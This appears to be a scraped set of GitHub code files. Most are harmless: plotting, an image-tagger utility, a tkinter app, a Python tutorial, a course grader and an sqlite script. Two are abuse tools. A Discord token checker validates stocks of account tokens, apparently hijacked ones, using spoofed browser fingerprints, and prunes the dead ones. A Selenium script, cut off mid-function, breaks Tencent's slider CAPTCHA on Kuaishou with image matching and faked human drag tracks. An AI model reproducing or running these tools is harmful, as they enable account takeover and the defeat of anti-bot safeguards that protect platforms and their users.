data6, usecols=(0,1,3), unpack=True)\nplt.plot(latitudes, remainder2[0:32]/base2[0:32], label ='L0N0, 3x3',color='g', linestyle='-')\n\n#Lat2, base2, remainder2 =np.loadtxt( data1, usecols=(0,1,3), unpack=True)\n#plt.plot(latitudes[14], remainder2[32]/base2[32], 'r*',label ='L5N200, 5x5; 5xEpochs')\n\n#Lat2, base2, remainder2 =np.loadtxt( data7, usecols=(0,1,3), unpack=True)\n#plt.plot(latitudes, remainder2[0:32]/base2[0:32], label ='L5N200, 5x5; tanh',color='C1', linestyle='dotted')\n\nplt.xlabel(\"Latitude\")\nplt.ylabel(\"Relative MAE Decrease\")\n\nplt.legend(loc='upper left', prop={'size':9}, bbox_to_anchor=(0.2,1.06), framealpha=1)\n\nplt.yscale('log')\nplt.savefig('lineplot_iter1_comparison.pdf', bbox_inches=0)\n\n\n \n","repo_name":"JanAckmann/MLPrecon","sub_path":"plot_Figure_2_a.py","file_name":"plot_Figure_2_a.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"36484358305","text":"import os\n\nfrom typing import List, Dict\nfrom pathlib import Path\n\nfrom modules import shared, scripts\nfrom preload import default_ddp_path\nfrom tagger.preset import Preset\nfrom tagger.interrogator import Interrogator, DeepDanbooruInterrogator, WaifuDiffusionInterrogator\n\npreset = Preset(Path(scripts.basedir(), 'presets'))\n\ninterrogators: Dict[str, Interrogator] = {}\n\n\ndef refresh_interrogators() -> List[str]:\n global interrogators\n interrogators = {\n 'wd14-convnextv2-v2': WaifuDiffusionInterrogator(\n 'wd14-convnextv2-v2',\n repo_id='SmilingWolf/wd-v1-4-convnextv2-tagger-v2',\n revision='v2.0'\n ),\n 'wd14-vit-v2': WaifuDiffusionInterrogator(\n 'wd14-vit-v2',\n repo_id='SmilingWolf/wd-v1-4-vit-tagger-v2',\n revision='v2.0'\n ),\n 'wd14-convnext-v2': WaifuDiffusionInterrogator(\n 'wd14-convnext-v2',\n repo_id='SmilingWolf/wd-v1-4-convnext-tagger-v2',\n revision='v2.0'\n ),\n 'wd14-swinv2-v2': WaifuDiffusionInterrogator(\n 'wd14-swinv2-v2',\n repo_id='SmilingWolf/wd-v1-4-swinv2-tagger-v2',\n revision='v2.0'\n ),\n 'wd14-convnextv2-v2-git': WaifuDiffusionInterrogator(\n 'wd14-convnextv2-v2',\n repo_id='SmilingWolf/wd-v1-4-convnextv2-tagger-v2',\n ),\n 'wd14-vit-v2-git': WaifuDiffusionInterrogator(\n 'wd14-vit-v2-git',\n repo_id='SmilingWolf/wd-v1-4-vit-tagger-v2'\n ),\n 'wd14-convnext-v2-git': WaifuDiffusionInterrogator(\n 'wd14-convnext-v2-git',\n repo_id='SmilingWolf/wd-v1-4-convnext-tagger-v2'\n ),\n 'wd14-swinv2-v2-git': WaifuDiffusionInterrogator(\n 'wd14-swinv2-v2-git',\n repo_id='SmilingWolf/wd-v1-4-swinv2-tagger-v2'\n ),\n 'wd14-vit': WaifuDiffusionInterrogator(\n 'wd14-vit',\n repo_id='SmilingWolf/wd-v1-4-vit-tagger'),\n 'wd14-convnext': WaifuDiffusionInterrogator(\n 'wd14-convnext',\n repo_id='SmilingWolf/wd-v1-4-convnext-tagger'\n ),\n }\n\n # load deepdanbooru project\n os.makedirs(\n getattr(shared.cmd_opts, 'deepdanbooru_projects_path', default_ddp_path),\n exist_ok=True\n )\n\n for path in os.scandir(shared.cmd_opts.deepdanbooru_projects_path):\n if not path.is_dir():\n continue\n\n if not Path(path, 'project.json').is_file():\n continue\n\n interrogators[path.name] = DeepDanbooruInterrogator(path.name, path)\n\n return sorted(interrogators.keys())\n\n\ndef split_str(s: str, separator=',') -> List[str]:\n return [x.strip() for x in s.split(separator) if x]\n","repo_name":"toriato/stable-diffusion-webui-wd14-tagger","sub_path":"tagger/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","stars":1063,"dataset":"github-code","pt":"52"} +{"seq_id":"19707820922","text":"from tkinter import Menu, messagebox, ttk\n\nfrom pyimg.config.interface_info import InterfaceInfo\nfrom pyimg.menus.border_menu import BorderMenu\nfrom pyimg.menus.filter_menu import FilterMenu\nfrom pyimg.menus.info_menu import InfoImageMenu\nfrom pyimg.menus.io_menu import ImageMenu\nfrom pyimg.menus.line_menu import LineMenu\nfrom pyimg.menus.noise_menu import NoiseImageMenu\nfrom pyimg.menus.point_operators import PointOperatorMenu\nfrom pyimg.menus.threshold_menu import ThresholdMenu\n\n\nclass App:\n def __init__(self):\n self.interface = InterfaceInfo.get_instance()\n root = self.interface.get_root()\n self.interface.configure()\n self.interface.load_frames()\n self.load_footer_buttons(self.interface)\n self.load_menu(root)\n\n def load_footer_buttons(self, interface):\n exit_program_btn = ttk.Button(\n interface.footer_frame,\n text=\"Exit Program\",\n command=lambda: self.ask_quit(root),\n )\n exit_program_btn.grid(column=0, row=0)\n clean_window_btn = ttk.Button(\n interface.footer_frame,\n text=\"Clean buttons\",\n command=lambda: interface.delete_widgets(interface.buttons_frame),\n )\n clean_window_btn.grid(column=1, row=0)\n clean_window_btn = ttk.Button(\n interface.footer_frame,\n text=\"Clean image\",\n command=interface.remove_images,\n )\n clean_window_btn.grid(column=2, row=0)\n\n def ask_quit(self, root):\n if messagebox.askokcancel(\"Quit\", \"Are you sure you want to quit?\"):\n root.destroy()\n\n def load_menu(self, root):\n menubar = Menu(root)\n root.config(menu=menubar)\n image_menu = ImageMenu(menubar=menubar, interface=self.interface)\n InfoImageMenu(menubar=menubar, image_io=image_menu.image_io)\n PointOperatorMenu(menubar=menubar, image_io=image_menu.image_io)\n NoiseImageMenu(menubar=menubar, image_io=image_menu.image_io)\n FilterMenu(menubar=menubar, image_io=image_menu.image_io)\n BorderMenu(menubar=menubar, image_io=image_menu.image_io)\n LineMenu(menubar=menubar, image_io=image_menu.image_io)\n ThresholdMenu(menubar=menubar, image_io=image_menu.image_io)\n\n\napp = App()\nroot = InterfaceInfo.get_instance().get_root()\n# main loop\nroot.mainloop()\n","repo_name":"levensworth/imgtools","sub_path":"pyimg/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28110434038","text":"\n'''\n* 문자열 (String)\n\n- 단일 문자들을 따옴표('', \"\")로 감싸서\n 나열한 문자 데이터의 집합형태이다.\n- 따옴표 안에 어떤 형태의 데이터가 들어가도 문자로 인식.\n- 전 세계의 모든 문자를 저장할 수 있고, 길이에도 제한이 없다. (파이썬3 utf-8 지원)\n'''\n\n# 나는 그에게 \"도와줘!\" 라고 말했다.\n# 탈출문자를 적용해서(\\) 따옴표를 문자로 표현할 수 있다.\ns1 = \"나는 그에게 \\\"도와줘!\\\" 라고 말했다.\"\n\n# Let's get together!\ns2 = 'Let\\'s get together!'\n\nfile1 = 'C:\\\\temp\\\\new.jpg'\nprint(file1)\n\n# 문자열 앞에 r이라는 접두어를 붙이면\n# 해당 문자열은 탈출 문자를 적용하지 않는다.(raw char sequence)\nfile2 = r'C:\\temp\\new.jpg'\nprint(file2)\n\nanthem = '''\n동해물과 백두산이 마르고 닳도록\n하느님이 보우하사 우리나라만세\n무궁화 삼천리 화려강산\n대한사람 대한으로 길이 보전하세\n'''\nprint(anthem)\n\n# \\를 문장 끝에 붙여주면 line continue 효과가 있다.\nanthem2 = '''\n동해물과 백두산이 마르고 닳도록 \\\n하느님이 보우하사 우리나라만세 \\\n무궁화 삼천리 화려강산 \\\n대한사람 대한으로 길이 보전하세\n'''\nprint(anthem2)\n\n'''\n* 문자열 연산\n\n- 파이썬은 문자열의 덧셈 연산과 곱셈 연산을 지원한다.\n- 덧셈 연산은 문자열을 서로 연결하여 결합한다.\n'''\ns3 = '오늘 저녁은 '\ns4 = '치킨입니다!'\nprint(s3 + s4 + ' 와 맛있겠다~')\n\n'''\n- 파이썬에서는 문자열의 곱셈 연산 또는 지원하고 있다.\n- 곱셈 연산자 (*)로 문자열을 정해진 수 만큼 반복 연결한다.\n'''\n\nprint('배고파' * 4)\nprint('-' * 30)\n\n# print(s3 * 1.7) (x)\n# print(s3 * s4) (x)","repo_name":"takemetoneverland/Python","sub_path":"Day01/6. data_type_str.py","file_name":"6. data_type_str.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"ko","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"139897338","text":"#!/usr/bin/env python3\nimport unittest, random, sys, copy, argparse, inspect\nimport numpy as np\nfrom graderUtil import graded, CourseTestRunner, GradedTestCase\n\n# Import student submission\nimport submission\nimport util\n\n#############################################\n# HELPER FUNCTIONS FOR CREATING TEST INPUTS #\n#############################################\n\n#########\n# TESTS #\n#########\nclass Test_2a(GradedTestCase):\n def setUp(self):\n np.random.seed(42)\n _, self.t_test = util.load_dataset('test.csv', label_col='t', add_intercept=True)\n \n @graded()\n def test_0(self):\n \"\"\"2a-0-basic: Fully Observed Binary Classifier (accuracy check on test set [>96%])\"\"\"\n p_test = submission.fully_observed_predictions('train.csv', 'test.csv', 'posonly_true_pred.txt', 'posonly_true_pred.png')\n self.assertTrue(p_test is not None, \"full predictions are None\")\n yhat = p_test > 0.5\n accuracy = np.mean((yhat == 1) == (self.t_test == 1))\n print('Fully Observed Binary Classifier Accuracy: {}'.format(accuracy * 100))\n self.assertTrue(accuracy * 100 >= 96)\n\nclass Test_2b(GradedTestCase):\n def setUp(self):\n np.random.seed(42)\n _, self.t_test = util.load_dataset('test.csv', label_col='t', add_intercept=True)\n \n @graded()\n def test_0(self):\n \"\"\"2b-0-basic: Naive Method Partial Labels Binary Classifier (accuracy check on test set [>=50%])\"\"\"\n p_test, _ = submission.naive_partial_labels_predictions('train.csv', 'test.csv', 'posonly_naive_pred.txt', 'posonly_naive_pred.png')\n self.assertTrue(p_test is not None, \"naive predictions are None\")\n yhat = p_test > 0.5\n accuracy = np.mean((yhat == 1) == (self.t_test == 1))\n print('Fully Observed Binary Classifier Accuracy: {}'.format(accuracy * 100))\n self.assertTrue(accuracy * 100 >= 50)\n\nclass Test_2f(GradedTestCase):\n def setUp(self):\n np.random.seed(42)\n _, self.t_test = util.load_dataset('test.csv', label_col='t', add_intercept=True)\n \n @graded()\n def test_0(self):\n \"\"\"2f-0-basic: Alpha estimation for binary classifier correction\"\"\"\n p_test, clf = submission.naive_partial_labels_predictions('train.csv', 'test.csv', 'posonly_naive_pred.txt', 'posonly_naive_pred.png')\n self.assertTrue(clf is not None, \"Logistic Regression Classifier from naive solution is None\")\n alpha = submission.find_alpha_and_plot_correction(clf,'valid.csv', 'test.csv', 'posonly_adjusted_pred.txt', 'posonly_adjusted_pred.png', p_test)\n self.assertTrue(alpha is not None, \"Correct alpha is None\")\n print('Alpha Correction Value: {}'.format(alpha))\n self.assertTrue(alpha > 0.16)\n\n @graded()\n def test_1(self):\n \"\"\"2f-1-basic: Alpha Corrected Binary Classification (accuracy check on test set [>93%])\"\"\"\n p_test, clf = submission.naive_partial_labels_predictions('train.csv', 'test.csv', 'posonly_naive_pred.txt', 'posonly_naive_pred.png')\n self.assertTrue(clf is not None, \"Logistic Regression Classifier from naive solution is None\")\n alpha = submission.find_alpha_and_plot_correction(clf,'valid.csv', 'test.csv', 'posonly_adjusted_pred.txt', 'posonly_adjusted_pred.png', p_test)\n self.assertTrue(alpha is not None, \"Correct alpha is None\")\n\n yhat = (p_test/alpha) > 0.5\n accuracy = np.mean((yhat == 1) == (self.t_test == 1))\n print('Fully Observed Binary Classifier Accuracy: {}'.format(accuracy * 100))\n self.assertTrue(accuracy * 100 >= 93)\n\ndef getTestCaseForTestID(test_id):\n question, part, _ = test_id.split('-')\n g = globals().copy()\n for name, obj in g.items():\n if inspect.isclass(obj) and name == ('Test_'+question):\n return obj('test_'+part)\n\nif __name__ == '__main__':\n # Parse for a specific test\n parser = argparse.ArgumentParser()\n parser.add_argument('test_case', nargs='?', default='all')\n test_id = parser.parse_args().test_case\n\n assignment = unittest.TestSuite()\n if test_id != 'all':\n assignment.addTest(getTestCaseForTestID(test_id))\n else:\n assignment.addTests(unittest.defaultTestLoader.discover('.', pattern='grader.py'))\n CourseTestRunner().run(assignment)","repo_name":"M1ddleton/Stanford-Machine-LearningXCS229","sub_path":"XCS229-PS2-master/src-incomplete/grader.py","file_name":"grader.py","file_ext":"py","file_size_in_byte":4053,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"4679533268","text":"import httpx, requests, os, base64\nimport colorama\nfrom colorama import Fore, init\nfrom pathlib import Path\nred = Fore.RED\ngreen = Fore.GREEN\nwhite = Fore.WHITE\ncyan = Fore.CYAN\n\ndef cls(): #clears the terminal\n os.system('cls' if os.name=='nt' else 'clear')\n \ndef get_super_properties():\n properties = '''{\"os\":\"Windows\",\"browser\":\"Chrome\",\"device\":\"\",\"system_locale\":\"en-GB\",\"browser_user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\",\"browser_version\":\"95.0.4638.54\",\"os_version\":\"10\",\"referrer\":\"\",\"referring_domain\":\"\",\"referrer_current\":\"\",\"referring_domain_current\":\"\",\"release_channel\":\"stable\",\"client_build_number\":102113,\"client_event_source\":null}'''\n properties = base64.b64encode(properties.encode()).decode()\n return properties\n\ndef get_fingerprint(s):\n try:\n fingerprint = s.get(f\"https://discord.com/api/v9/experiments\", timeout=5).json()[\"fingerprint\"]\n return fingerprint\n except Exception as e:\n return \"Error\"\n\ndef get_cookies(s, url):\n try:\n cookieinfo = s.get(url, timeout=5).cookies\n dcf = str(cookieinfo).split('__dcfduid=')[1].split(' ')[0]\n sdc = str(cookieinfo).split('__sdcfduid=')[1].split(' ')[0]\n return dcf, sdc\n except:\n return \"\", \"\"\n\ndef get_proxy():\n pass\n\n\ndef get_headers(token):\n while True:\n s = httpx.Client(proxies=get_proxy())\n dcf, sdc = get_cookies(s, \"https://discord.com/\")\n fingerprint = get_fingerprint(s)\n if fingerprint != \"Error\":\n break\n super_properties = get_super_properties()\n headers = {\n 'authority': 'discord.com',\n 'method': 'POST',\n 'path': '/api/v9/users/@me/channels',\n 'scheme': 'https',\n 'accept': '*/*',\n 'accept-encoding': 'gzip, deflate',\n 'accept-language': 'en-US',\n 'authorization': token,\n 'cookie': f'__dcfduid={dcf}; __sdcfduid={sdc}',\n 'origin': 'https://discord.com',\n 'sec-ch-ua': '\"Google Chrome\";v=\"95\", \"Chromium\";v=\"95\", \";Not A Brand\";v=\"99\"',\n 'sec-ch-ua-mobile': '?0',\n 'sec-ch-ua-platform': '\"Windows\"',\n 'sec-fetch-dest': 'empty',\n 'sec-fetch-mode': 'cors',\n 'sec-fetch-site': 'same-origin',\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36',\n 'x-debug-options': 'bugReporterEnabled',\n 'x-fingerprint': fingerprint,\n 'x-super-properties': super_properties,\n }\n return s, headers\n\ndef validate_token(s, headers):\n check = s.get(f\"https://discord.com/api/v9/users/@me\", headers=headers)\n if check.status_code == 200:\n profile_name = check.json()[\"username\"]\n profile_discrim = check.json()[\"discriminator\"]\n profile_of_user = f\"{profile_name}#{profile_discrim}\"\n return profile_of_user\n else:\n return False\n\ndef find_token(token):\n if ':' in token:\n token_chosen = None\n tokensplit = token.split(\":\")\n for thing in tokensplit:\n if '@' not in thing and '.' in thing and len(\n thing) > 30: \n token_chosen = thing\n break\n if token_chosen == None:\n print(f\"Error finding token\", Fore.RED)\n return None\n else:\n return token_chosen\n\n\n else:\n return token\n \ndef removeToken(token: str, file:str):\n with open(file, \"r\") as f:\n fulltokens = f.read().splitlines()\n Tokens = []\n for j in fulltokens:\n p = find_token(j)\n Tokens.append(p)\n for t in Tokens:\n if len(t) < 5 or t == token:\n Tokens.remove(t)\n open(file, \"w\").write(\"\\n\".join(Tokens))\n\ndef get_all_tokens(filename):\n all_tokens = []\n with open(filename, 'r') as f:\n for line in f.readlines():\n token = line.strip()\n token = find_token(token)\n if token != None:\n all_tokens.append(token)\n\n return all_tokens\n\ndef checkEmpty(file):\n mypath = Path(file)\n\n if mypath.stat().st_size == 0:\n return True\n else:\n return False\n\ndef nitrochecker():\n\n three_m_working = 0\n one_m_working = 0\n\n three_m_used = 0\n one_m_used = 0\n\n three_m_nonitro = 0\n one_m_nonitro = 0\n\n three_m_invalid = 0\n one_m_invalid = 0\n\n three_m_locked = 0\n one_m_locked = 0\n\n three_m_tokens = get_all_tokens(\"3m_tokens.txt\")\n one_m_tokens = get_all_tokens(\"1m_tokens.txt\")\n print(\"Checking 3 Months Nitro Tokens\")\n\n if checkEmpty(\"3m_tokens.txt\"):\n print(red + \"No Stock To Check\" + white)\n\n else:\n\n for token in three_m_tokens: \n file = \"3m_tokens.txt\"\n s, headers = get_headers(token)\n profile = validate_token(s, headers)\n\n if profile != False:\n boost_data = s.get(f\"https://discord.com/api/v9/users/@me/guilds/premium/subscription-slots\", headers={'Authorization': token})\n\n if boost_data.status_code == 403:\n print(red + f\" ✗ {white}{token} - {profile}{red} [LOCKED]\" + white)\n removeToken(token, file)\n three_m_locked += 1\n if len(boost_data.json()) != 0 and boost_data.status_code == 200 or boost_data.status_code == 201:\n if boost_data.json()[0]['cooldown_ends_at'] != None:\n print(red + f\" ✗ {white}{token} - {profile}{red} [USED]\" + white)\n removeToken(token, file)\n three_m_used += 1\n if len(boost_data.json()) == 0:\n removeToken(token, file)\n print(f\"{red} ✗ {white}{token} - {profile}{red} [NO NITRO]\" + white)\n three_m_nonitro += 1\n else:\n if len(boost_data.json()) != 0 and boost_data.status_code == 200 or boost_data.status_code == 201:\n if boost_data.json()[0]['cooldown_ends_at'] == None:\n\n print(f\"{green} ✓ {white}{token} - {profile}{green} [WORKING]\" + white)\n three_m_working += 1\n else:\n print(red + f\" ✗ {white}{token}{red} [INVALID]\" + white)\n removeToken(token, file)\n three_m_invalid += 1\n print()\n print(\"Checking 1 Month Nitro Tokens\")\n if checkEmpty(\"1m_tokens.txt\"):\n print(red + \"No Stock To Check\" + white) \n else:\n for token in one_m_tokens: \n file = \"1m_tokens.txt\"\n s, headers = get_headers(token)\n profile = validate_token(s, headers)\n if profile != False:\n boost_data = s.get(f\"https://discord.com/api/v9/users/@me/guilds/premium/subscription-slots\", headers={'Authorization': token})\n\n if boost_data.status_code == 403:\n print(red + f\" ✗ {white}{token} - {profile}{red} [LOCKED]\" + white)\n removeToken(token, file)\n one_m_locked += 1\n if len(boost_data.json()) != 0 and boost_data.status_code == 200 or boost_data.status_code == 201:\n if boost_data.json()[0]['cooldown_ends_at'] != None:\n print(red + f\" ✗ {white}{token} - {profile}{red} [USED]\" + white)\n removeToken(token, file)\n one_m_used += 1\n if len(boost_data.json()) == 0:\n removeToken(token, file)\n print(f\"{red} ✗ {white}{token} - {profile}{red} [NO NITRO]\" + white)\n one_m_nonitro += 1\n else:\n if len(boost_data.json()) != 0 and boost_data.status_code == 200 or boost_data.status_code == 201:\n if boost_data.json()[0]['cooldown_ends_at'] == None:\n\n print(f\"{green} ✓ {white}{token} - {profile}{green} [WORKING]\" + white)\n one_m_working += 1\n else:\n print(red + f\" ✗ {white}{token}{red} [INVALID]\" + white)\n removeToken(token, file)\n one_m_invalid += 1\n\n print(f\"{green}WORKING (with nitro) : {white}{three_m_working} | {red}USED : {white}{three_m_used} | {red}NO NITRO : {white}{three_m_nonitro} | {red}LOCKED : {white}{three_m_locked} | {red}INVALID : {white}{three_m_invalid}\")\n print(f\"{green}WORKING (with nitro) : {white}{one_m_working} | {red}USED : {white}{one_m_used} | {red}NO NITRO : {white}{one_m_nonitro} | {red}LOCKED : {white}{one_m_locked} | {red}INVALID : {white}{one_m_invalid}\")\n\ncls()\nnitrochecker()\n","repo_name":"lmaoonyx/nitro-token-checker-1","sub_path":"checker.py","file_name":"checker.py","file_ext":"py","file_size_in_byte":8797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40882755701","text":"import os\nimport sqlite3\npath, _ = os.path.split(os.path.realpath(__file__))\nconn = sqlite3.connect(path+'/11/db.sqlite3')\nconneted_sqlite = conn.cursor()\n#raw = conneted_sqlite.execute('select game, aview from music')\nraw = conneted_sqlite.execute('select game, id, year, month from music where aview!=\"none\"')\ngame_name = {}\n\n\nraw = list(raw)\nprint(len(raw))\ntemp = {}\nfor i in range(0,len(raw)):\n\tif len(str(raw[i][3]))==1:\n\t\tmonth = '-0'+str(raw[i][3])\n\telse:\n\t\tmonth = '-'+str(raw[i][3])\n\ttime = str(raw[i][2])+str(month)\n\tif raw[i][0] in temp:\n\t\tif time in temp[raw[i][0]]:\n\t\t\ttemp[raw[i][0]][time] = str(temp[raw[i][0]][time]) + ','+str(raw[i][1])\n\t\telse:\n\t\t\ttemp[raw[i][0]][time] = str(raw[i][1])\n\telse:\n\t\ttemp[raw[i][0]]={}\n\t\tif time in temp[raw[i][0]]:\n\t\t\ttemp[raw[i][0]][time] = str(temp[raw[0]][time]) + ','+str(raw[i][1])\n\t\telse:\n\t\t\ttemp[raw[i][0]][time] = str(raw[i][1])\n#print(temp)\ntotal=0\nfor key, value in temp.items():\n\tfor month, ids in value.items():\n\t\tids = ids.split(',')\n\t\tlength = len(ids)\n\t\ttotal = total + length\n\t\tprint(\"game\",key,\"month\",month,\"comment\",(length),'id',ids)\n#assert total == len(raw)","repo_name":"AlexTsai1618/project_NLP","sub_path":"Music_NEW/monthcom.py","file_name":"monthcom.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73888237284","text":"# -*- coding:utf-8 -*-\n# @Time : 2019/11/20 13:52\n# @Author : litao\nimport numpy as np\nimport random\n\nimport json,redis,re,requests\nfrom selenium.webdriver import ActionChains\nimport time,datetime\nfrom selenium import webdriver\nfrom PIL import Image\nimport os\nfrom selenium.webdriver.support.ui import WebDriverWait\nimport cv2\nfrom fontTools.ttLib import *\n\n\nclass Login(object):\n \"\"\"\n 腾讯防水墙滑动验证码破解\n 使用OpenCV库\n 成功率大概90%左右:在实际应用中,登录后可判断当前页面是否有登录成功才会出现的信息:比如用户名等。循环\n https://open.captcha.qq.com/online.html\n 破解 腾讯滑动验证码\n 腾讯防水墙\n python + seleniuum + cv2\n \"\"\"\n\n rds = redis.StrictRedis(host='192.168.17.60', port=6379, db=2, decode_responses=True)\n # chrome_options = webdriver.ChromeOptions()\n # chrome_options.add_argument('--headless')\n # chrome_options.add_argument('--disable-gpu')\n # # self.chrome_options.add_argument(\"--start-maximized\")\n # chrome_options.add_argument(\"--no-sandbox\")\n # chrome_options.add_experimental_option('excludeSwitches', ['enable-automation'])\n # timestamp = str(datetime.datetime.now().timestamp() * 1e3)\n # first_page_headers = {\n # \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\",\n # \"Accept-Encoding\": \"gzip, deflate, br\",\n # \"Accept-Language\": \"zh-CN,zh;q=0.9\",\n # \"Cache-Control\": \"max-age=0\",\n # \"Connection\": \"keep-alive\",\n # \"Host\": \"live.kuaishou.com\",\n # \"Upgrade-Insecure-Requests\": \"1\",\n # \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36\",\n # }\n\n def __init__(self):\n # 如果是实际应用中,可在此处账号和密码\n # self.url = \"https://open.captcha.qq.com/online.html\"\n self.chrome_options = webdriver.ChromeOptions()\n self.chrome_options.add_argument('--headless')\n self.chrome_options.add_argument('--disable-gpu')\n # self.chrome_options.add_argument(\"--start-maximized\")\n self.chrome_options.add_argument(\"--no-sandbox\")\n self.chrome_options.add_experimental_option('excludeSwitches', ['enable-automation'])\n self.timestamp = str(datetime.datetime.now().timestamp()*1e3)\n self.first_page_headers = {\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\",\n \"Accept-Encoding\": \"gzip, deflate, br\",\n \"Accept-Language\": \"zh-CN,zh;q=0.9\",\n \"Cache-Control\": \"max-age=0\",\n \"Connection\": \"keep-alive\",\n \"Host\": \"live.kuaishou.com\",\n \"Upgrade-Insecure-Requests\": \"1\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36\",\n }\n # self.rds = redis.StrictRedis(host='192.168.17.60', port=6379, db=2, decode_responses=True)\n\n\n @staticmethod\n def show(name):\n cv2.imshow('Show', name)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n @staticmethod\n def webdriverwait_send_keys(dri, element, value):\n \"\"\"\n 显示等待输入\n :param dri: driver\n :param element:\n :param value:\n :return:\n \"\"\"\n WebDriverWait(dri, 10, 5).until(lambda dr: element).send_keys(value)\n\n @staticmethod\n def webdriverwait_click(dri, element):\n \"\"\"\n 显示等待 click\n :param dri: driver\n :param element:\n :return:\n \"\"\"\n WebDriverWait(dri, 10, 5).until(lambda dr: element).click()\n\n\n def get_postion(self,chunk, canves):\n \"\"\"\n 判断缺口位置\n :param chunk: 缺口图片是原图\n :param canves:\n :return: 位置 x, y\n \"\"\"\n otemp = chunk\n oblk = canves\n target = cv2.imread(otemp, 0)\n template = cv2.imread(oblk, 0)\n # w, h = target.shape[::-1]\n temp = './image/temp_%s.jpg' % self.timestamp\n targ = './image/targ_%s.jpg' % self.timestamp\n cv2.imwrite(temp, template)\n cv2.imwrite(targ, target)\n target = cv2.imread(targ)\n target = cv2.cvtColor(target, cv2.COLOR_BGR2GRAY)\n target = abs(255 - target)\n cv2.imwrite(targ, target)\n target = cv2.imread(targ)\n template = cv2.imread(temp)\n result = cv2.matchTemplate(target, template, cv2.TM_CCOEFF_NORMED)\n x, y = np.unravel_index(result.argmax(), result.shape)\n return x, y\n # # 展示圈出来的区域\n # cv2.rectangle(template, (y, x), (y + w, x + h), (7, 249, 151), 2)\n # cv2.imwrite(\"yuantu.jpg\", template)\n # show(template)\n\n @staticmethod\n def get_track(distance):\n \"\"\"\n 模拟轨迹 假装是人在操作\n :param distance:\n :return:\n \"\"\"\n # 初速度\n v = 0\n # 单位时间为0.2s来统计轨迹,轨迹即0.2���的位移\n t = 0.2\n # 位移/轨迹列表,列表内的一个元素代表0.2s的位移\n tracks = []\n # 当前的位移\n current = 0\n # 到达mid值开始减速\n mid = distance * 7 / 8\n\n distance += 10 # 先滑过一点,最后再反着滑动回来\n # a = random.randint(1,3)\n while current < distance:\n if current < mid:\n # 加速度越小,单位时间的位移越小,模拟的轨迹就越多越详细\n a = random.randint(2, 4) # 加速运动\n else:\n a = -random.randint(3, 5) # 减速运动\n\n # 初速度\n v0 = v\n # 0.2秒时间内的位移\n s = v0 * t + 0.5 * a * (t ** 2)\n # 当前的位置\n current += s\n # 添加到轨迹列表\n tracks.append(round(s))\n\n # 速度已经达到v,该速度作为下次的初速度\n v = v0 + a * t\n\n # 反着滑动到大概准确位置\n for i in range(4):\n tracks.append(-random.randint(2, 3))\n for i in range(4):\n tracks.append(-random.randint(1, 3))\n return tracks\n\n\n\n @staticmethod\n def urllib_download(imgurl, imgsavepath):\n \"\"\"\n 下载图片\n :param imgurl: 图片url\n :param imgsavepath: 存放地址\n :return:\n \"\"\"\n from urllib.request import urlretrieve\n urlretrieve(imgurl, imgsavepath)\n\n def after_quit(self):\n \"\"\"\n 关闭浏览器\n :return:\n \"\"\"\n self.driver.quit()\n\n def get_num_dic(self):\n xml_re = {\n '': 0,\n '': 0,\n '': 1,\n '': 1,\n '': 2,\n '': 2,\n '': 3,\n '': 3,\n '': 4,\n '': 4,\n '': 5,\n '': 5,\n '': 6,\n '': 6,\n '': 7,\n '': 7,\n '': 8,\n '': 8,\n '': 9,\n '': 9\n }\n uni_code_dic = {}\n try:\n for re_code in xml_re:\n code_dic = re.findall(re_code, self.xml_text)\n if code_dic:\n uni_code_dic[code_dic[0].replace(\"uni\", \"\\\\\\\\u\").lower()] = xml_re[re_code]\n # print(\"uni_code_dic\", uni_code_dic)\n return uni_code_dic\n except:\n print(\"can't find \",self.xml_text)\n return False\n\n def unicode_to_num(self, uni_str):\n count_num = str(uni_str.encode(\"unicode_escape\"))[2:-1]\n # print(count_num)\n for i in self.uni_code_dic:\n if i in count_num:\n count_num = count_num.replace(i, str(self.uni_code_dic[i]))\n # print(count_num)\n return count_num\n\n def login_main(self,url):\n\n driver = self.driver\n driver.maximize_window()\n # driver.get(self.url)\n\n # click_keyi_username = driver.find_element_by_xpath(\"//div[@class='wp-onb-tit']/a[text()='可疑用户']\")\n # self.webdriverwait_click(driver, click_keyi_username)\n\n self.driver.get(url)\n self.driver.implicitly_wait(5)\n res = self.driver.find_element_by_xpath(\"/html/body/iframe\")\n # print(res.get_attribute(\"src\"))\n # print(self.driver.page_source)\n #self.driver.get(res.get_attribute(\"src\"))\n\n # login_button = driver.find_element_by_id('slide_bar_head')\n # self.webdriverwait_click(driver, login_button)\n # time.sleep(1)\n\n driver.switch_to.frame(driver.find_element_by_xpath('/html/body/iframe')) # switch 到 滑块frame\n time.sleep(0.5)\n try:\n bk_block = driver.find_element_by_xpath('//*[@id=\"slideBkg\"]') # 大图\n except:\n bk_block = 